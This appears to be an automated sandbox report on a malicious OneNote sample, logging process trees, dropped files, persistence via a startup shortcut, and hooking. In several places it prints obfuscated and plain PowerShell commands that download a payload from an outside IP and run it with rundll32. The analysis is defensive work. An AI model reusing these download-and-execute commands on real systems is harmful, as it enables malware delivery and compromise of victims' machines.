Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg');	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\gb.jpg,Wind	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\programdata\gb.jpg,Wind	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\backgroundTaskHost.exe C:\Windows\SysWOW64\backgroundTaskHost.exe	Jump to behavior

Source: Send to OneNote.lnk.0.dr

LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

File created: C:\Users\user\Documents\{DDFA7D8F-AF99-4101-A7C8-1702B1E94F6B}

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Local\Temp\{11E4938C-2561-4ECF-9AE1-F6A34EF41A76} - OProcSessId.dat

Jump to behavior

Source: e77242d6.dll.15.dr

Binary string: \Device\IPT[

Source: classification engine

Classification label: mal100.troj.expl.evad.winONE@19/732@0/2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_1000D972 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,

15_2_1000D972

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

File read: C:\Program Files\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_100011EB CreateBitmapIndirect,CreateBrushIndirect,CreateDIBPatternBrush,CreateDIBPatternBrushPt,CreateDIBSection,CreateEllipticRgn,CreateEllipticRgnIndirect,CreateEnhMetaFileA,CreateFontA,CreateFontIndirectExW,CreateHalftonePalette,CreateHatchBrush,CreatePatternBrush,CreatePenIndirect,CreateRectRgnIndirect,CreateRoundRectRgn,CreateScalableFontResourceA,CreateScalableFontResourceW,CreateSolidBrush,GdiGetBatchLimit,GdiTransparentBlt,WICMapGuidToShortName,WICMapSchemaToName,WICMapShortNameToGuid,AccessCheckAndAuditAlarmA,AccessCheckByTypeAndAuditAlarmA,AddAccessAllowedAce,AddAccessAllowedAceEx,AddAccessDeniedAce,AddAuditAccessObjectAce,BuildTrusteeWithSidA,ChangeServiceConfig2A,CloseTrace,ConvertToAutoInheritPrivateObjectSecurity,CreatePrivateObjectSecurity,EnumerateTraceGuidsEx,EqualDomainSid,EventActivityIdControl,EventWrite,EventWriteEx,EventWriteString,EventWriteTransfer,FindFirstFreeAce,GetEventLogInformation,GetAce,

15_2_100011EB

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_1000CD1E CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

15_2_1000CD1E

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\gb.jpg,Wind

Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Mutant created: \Sessions\1\BaseNamedObjects\{0C1FC4BB-18AC-4766-8E40-0FC71E4C8536}
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Mutant created: \Sessions\1\BaseNamedObjects\{513D75E9-431D-4895-9B46-EEFA6B9D38BA}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:384:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:384:120:WilError_03
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE	Mutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared
Source: C:\Windows\SysWOW64\backgroundTaskHost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{0C1FC4BB-18AC-4766-8E40-0FC71E4C8536}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:304:WilStaging_02

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source:	Binary string: amstream.pdb source: backgroundTaskHost.exe, 00000010.00000003.2711489777.0000000004611000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: e77242d6.dll.15.dr
Source:	Binary string: wntdll.pdb source: e77242d6.dll.15.dr
Source:	Binary string: amstream.pdbGCTL source: backgroundTaskHost.exe, 00000010.00000003.2711489777.0000000004611000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg=='))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg');
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe $atKUf9 = '62889e73828c756c961c5a6d6c01a463'; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnNldCBhMXlKRFJMUT1heHZnc0sNCnNldCBhTFF1Q1J5NT1hSG5CZFVNMg0Kc2V0IGFGZGl6SWtEdD1hYlBTNXENCnBvd2Vyc2hlbGwgKG5ldy1vYmplY3Qgc3lzdGVtLm5ldC53ZWJjbGllbnQpLmRvd25sb2FkZmlsZSgnaHR0cDovLzg3LjIzNi4xNDYuMzEvMzgxOTkuZGF0JywgJ0M6XHByb2dyYW1kYXRhXGdiLmpwZycpOw0Kc2V0IGFnTWFlM3BDPWF5YXUzDQpzZXQgYW1QdFVNY0E9YVJaamUNCmNhbGwgcnUlMWxsMzIgQzpccHJvZ3JhbWRhdGFcZ2IuanBnLFdpbmQNCmV4aXQNCg=='))	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg');	Jump to behavior

Source: e77242d6.dll.15.dr	Static PE information: section name: RT
Source: e77242d6.dll.15.dr	Static PE information: section name: .mrdata
Source: e77242d6.dll.15.dr	Static PE information: section name: .00cfg

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 15_2_1000970D LoadLibraryA,GetProcAddress,

15_2_1000970D

Source: gb.jpg.13.dr

Static PE information: real checksum: 0x76d79 should be: 0xb481

Source: e77242d6.dll.15.dr

Static PE information: 0x8A32A22A [Mon Jun 22 08:22:02 2043 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 6.845118704586284

Persistence and Installation Behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg');
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object system.net.webclient).downloadfile('http://87.236.146.31/38199.dat', 'C:\programdata\gb.jpg');			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\gb.jpg

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\gb.jpg

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\gb.jpg			Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\e77242d6.dll			Jump to dropped file

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

DLL reload attack detected

Source: C:\Windows\SysWOW64\rundll32.exe

Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\E77242D6.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Windows\SysWOW64\rundll32.exe

Memory written: PID: 3124 base: E61790 value: E9 2E FE 92 FF

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
